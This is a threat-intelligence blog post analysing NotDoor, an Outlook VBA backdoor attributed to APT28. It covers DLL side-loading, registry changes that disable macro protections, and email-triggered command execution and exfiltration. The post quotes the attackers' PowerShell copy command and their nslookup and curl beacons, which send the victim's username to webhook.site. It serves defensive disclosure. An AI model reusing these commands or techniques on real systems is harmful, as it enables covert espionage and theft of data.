{"id":2956,"date":"2025-09-03T09:59:47","date_gmt":"2025-09-03T07:59:47","guid":{"rendered":"https:\/\/lab52.io\/blog\/?p=2956"},"modified":"2025-09-03T10:02:44","modified_gmt":"2025-09-03T08:02:44","slug":"analyzing-notdoor-inside-apt28s-expanding-arsenal","status":"publish","type":"post","link":"https:\/\/lab52.io\/blog\/analyzing-notdoor-inside-apt28s-expanding-arsenal\/","title":{"rendered":"Analyzing NotDoor: Inside APT28\u2019s Expanding Arsenal"},"content":{"rendered":"\n

LAB52, the intelligence team at S2 Grupo, has identified a new backdoor for Outlook attributed to the persistent threat group APT28, which is linked to the Russian intelligence service and has compromised multiple companies from various sectors in NATO member countries.<\/p>\n\n\n\n

The artefact, dubbed NotDoor due to the use of the word \u2018Nothing\u2019 within the code, is a VBA macro for Outlook designed to monitor incoming emails for a specific trigger word. When such an email is detected, it enables an attacker to exfiltrate data, upload files, and execute commands on the victim\u2019s computer.<\/p>\n\n\n\n

Backdoor setup<\/h1>\n\n\n\n

To evade detection, the backdoor will be deployed via the legitimate signed binary Microsoft OneDrive.exe signed binary,<\/strong> which is vulnerable to the DLL side-loading technique. This process will load the malicious DLL SSPICLI.dll,<\/strong> , responsible for installing the VBA backdoor and disabling multiple macro security protections. The attacker would have previously placed the backdoor in c:\\programdata\\testtemp.ini<\/strong> to enable this execution chain.<\/p>\n\n\n

\n
\"\"
Malicious DLL detections<\/figcaption><\/figure><\/div>\n\n\n

The loader will run three PowerShell commands, each encoded in Base64.<\/p>\n\n\n

\n
\"\"
Encoded PowerShell command<\/figcaption><\/figure><\/div>\n\n\n

The first command will copy the file c:\\programdata\\testtemp.ini<\/strong> to %APPDATA%\\Microsoft\\Outlook\\VbaProject.OTM, <\/strong>which contains the macros that Outlook will execute.<\/p>\n\n\n\n

$a=$env:APPDATA;copy c:\\programdata\\testtemp.ini \"$a\\Microsoft\\Outlook\\VbaProject.OTM\"<\/code><\/pre>\n\n\n\n
The second command performs an nslookup<\/strong> on a domain incorporating the username, using the webhook.site DNS hooking service previously employed in the group\u2019s campaigns. This appears to serve as a mechanism for the attackers to verify that the code executed successfully on the victim\u2019s machine.<\/p>\n\n\n\n
nslookup \"$env:USERNAME.910cf351-a05d-4f67-ab8e-6f62cfa8e26d.dnshook[.site\"<\/code><\/pre>\n\n\n\n
Finally, the third command sends a curl<\/strong> request to a webhook.site URL, serving the same purpose.<\/p>\n\n\n\n
cmd \/c curl \"hxxp:\/\/webhook[.site\/910cf351-a05d-4f67-ab8e-6f62cfa8e26d?$env:USERNAME\"<\/code><\/pre>\n\n\n\n
The loader establishes persistence by enabling the LoadMacroProviderOnBoot<\/strong> subkey within the Software\\Microsoft\\Office\\16.0\\Outlook<\/strong> registry key.<\/p>\n\n\n
\n
\"\"
Persistence<\/figcaption><\/figure><\/div>\n\n\n
Next, the loader enables macro execution by modifying the Level<\/strong> subkey under Software\\Microsoft\\Office\\16.0\\Outlook\\Security<\/strong> in the Windows registry.<\/p>\n\n\n
\n
\"\"
Macro activation<\/figcaption><\/figure><\/div>\n\n\n
Finally, dialogue messages are disabled by modifying the Software\\Microsoft\\Office\\16.0\\Outlook\\Options\\General<\/strong> registry key, reducing the likelihood of detection by the user.<\/p>\n\n\n
\n
\"\"
Deactivation of dialogue messages<\/figcaption><\/figure><\/div>\n\n\n
NotDoor: a silent backdoor<\/h1>\n\n\n\n
The backdoor will be a VBA project for Outlook that, at the time of analysis, presents few detections.<\/p>\n\n\n
\n
\"\"
NotDoor backdoor detections<\/figcaption><\/figure><\/div>\n\n\n
The malware leverages the Application_MAPILogonComplete<\/strong> and Application_NewMailEx<\/strong> events to execute code whenever Outlook is started or a new email arrives. The project is obfuscated, with variable and function names replaced by random alphabetic strings to conceal its behavior. Additionally, the malware employs a unique string encoding technique for both internal data and dynamically generated strings. This method involves prepending random alphanumeric characters to a valid Base64 string, creating the illusion of encryption when decoded.<\/p>\n\n\n
\n
\"\"
Custom encryption<\/figcaption><\/figure><\/div>\n\n\n
Upon logging in, the malware will create a folder at the path %TEMP%\\Temp<\/strong> if it does not already exist. This folder serves as a repository for various artifacts generated during the malware\u2019s operation. If the folder contains any files when the malware starts, their contents will be sent via email to a.matti444@proton[.me<\/strong>, with the subject line “Re: 0”<\/strong>, after which the files will be deleted, regardless of whether they were successfully sent or not.<\/p>\n\n\n
\n
\"\"
Example to sent email at logon<\/figcaption><\/figure><\/div>\n\n\n
When the client receives an email, it first checks for the presence of a specific string on a designated line that triggers the backdoor functions. If the string is found, the malware parses the email\u2019s contents to extract the commands to be executed. In the analyzed sample, this trigger string is “Daily Report”<\/strong>; however, the backdoor allows multiple triggers to be configured, so the string may vary in other instances. Once the backdoor is activated, the email that triggered it is deleted.<\/p>\n\n\n
\n
\"\"
Trigger<\/figcaption><\/figure><\/div>\n\n\n
The received email must follow a specific structure. First, it must include a numerical value that serves as an identifier. Next, it must contain an email address for data exfiltration, which is encrypted using the malware\u2019s custom encryption algorithm. Finally, the malware supports multiple commands per email, also encrypted using the same algorithm. Below is an example of an email that would trigger the backdoor\u2019s functionality.<\/p>\n\n\n
\n
\"\"
Example of email<\/figcaption><\/figure><\/div>\n\n\n
In particular, the malware allows the following four commands.<\/p>\n\n\n\n
Command<\/td>Description<\/td><\/tr>
cmd<\/td>Executes commands and returns the standard output as an email attachment.<\/td><\/tr>
cmdno<\/td>Executes commands.<\/td><\/tr>

dwn<\/td>		Exfiltrates files from the victim\u2019s computer by sending them as email attachments.<\/td><\/tr>

upl<\/td>		Upload files directly onto the victim\u2019s computer.<\/td><\/tr><\/tbody><\/table>
List of commands<\/figcaption><\/figure>\n\n\n\n
The results of these commands will be sent to the sender using an email with the subject line in the following format: “Re: <ID> <EMAIL SUBJECT>”.<\/strong> The files will be sent as attachments and the results of the execution will be sent in the body of the email.<\/p>\n\n\n
\n
\"\"
Example of an email sent when the backdoor is activated<\/figcaption><\/figure><\/div>\n\n\n
Files exfiltrated by the malware are saved in the  folder. Each file is named using a predefined list of names and extensions, following the format <NAME>_<ID>.<EXTENSION>.<\/strong> The file contents are encoded using the malware\u2019s custom encryption, sent via email, and then deleted from the system.<\/p>\n\n\n
\n
\"\"
Generated file<\/figcaption><\/figure><\/div>\n\n\n
Below is a list of possible filenames.<\/p>\n\n\n\n